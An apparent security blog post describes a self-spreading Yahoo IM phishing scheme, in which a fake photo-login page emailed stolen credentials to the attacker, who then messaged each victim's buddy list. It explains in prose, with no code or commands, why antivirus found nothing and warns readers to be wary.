Being in this business, we are often called upon to help clean up the computers of families and friends. In the past I have had many friends who thought they had a virus, but usually it was just some other system anomaly. Times have changed though, and now I tend to see a lot of adware and spyware as well as infections from worms and IRC bots. Usually it is just a matter of running a few tools, deleting a few registry keys and files and everything is better.
So, when a friend of mine recently sent me an odd instant message (IM) on Yahoo IM, I wasn’t that surprised. I immediately recognized it as suspicious, since my friend would have no reason to be using a free Brazilian homepage Web site, and I don’t think he had ever written a smiley face in the manner displayed on the IM. (See figure 1)
I downloaded the page on a safe network (not using a browser) and had a look at the HTML code. When the page is rendered in a browser, to an unsuspecting user it appears that in order to view the Web site photos you need to login. (See figure 2)
This in itself isn’t very unusual, and furthermore the page is hosted on a yahoo.com.br domain, so it all appears safe. However, embedded and heavily obfuscated inside the page was code that caused the Yahoo IM login credentials to be sent to a hotmail.com email address after they were entered. (See figure 3)
I figured that my friend’s computer must be infected and sent him a message to run a few tools and send me back the logs. I was pretty sure I’d find an infection, tell him to delete a few files, and remind him to use an antivirus product. It turned out he was already using an antivirus product and after going through the logs from the tools I sent, I found nothing suspicious. I was a bit stumped. The threat could have been super complex, polymorphic, rootkit stealthing, or a memory-only threat, but the chances of that were slim. These days there is so much low-hanging fruit in the form of unsuspecting computer users that your average script kiddie doesn’t go to complex lengths even if the tools are available to them.
After questioning my friend some more to see if his antivirus product happened to detect anything afterwards or if he had deleted it already, the picture became clearer to me. There was no file-based threat and there was nothing to find on his system. What was happening was that some hacker spammed out the phishing link to a group of harvested Yahoo IM users who then clicked on the link. Thinking they were required to login to see the Web photos, they entered their Yahoo ID and password. Once they logged in, their credentials were sent to the hotmail.com email address. The hacker then used the login credentials (likely in an automated fashion) to logon to Yahoo IM. This will cause the victim to be kicked off the network, which is a feature of Yahoo IM (if you log in at a different location your existing connection is bumped off.)
Now logged into Yahoo IM as someone else, the hacker would have access to the victim’s buddy list, and then would send the same phishing link to everyone on that list so the recipients would think the message was coming from a friend. The recipients would then click on the link, provide their Yahoo credentials, be bumped off the network, and have all of their friends receive the link and so the cycle would continue. This allowed the hacker to collect Yahoo login IDs and passwords and at the same time replicate his phishing attempt—all without creating an actual file—so there really wasn’t anything for the antivirus program to detect and nothing for me to find.
I sent off the domains in question to the relevant authorities to have them shutdown, but in that span of just a couple of days, the hacker had definitely acquired quite a few Yahoo credentials and we can now only guess at what he ultimately decided to do with them. Since Yahoo shares login credentials across all of their services, the hacker could easily read a person’s email, log in to their Yahoo Wallet account, view their portal page with their financial portfolio, impersonate them on IM, and likewise trade or sell all of this information.
These types of phishing attempts are getting more and more sophisticated every day and we need to be very wary of them. Spotting the real page from a fake page can be difficult, especially when they are hosted on the proper domain.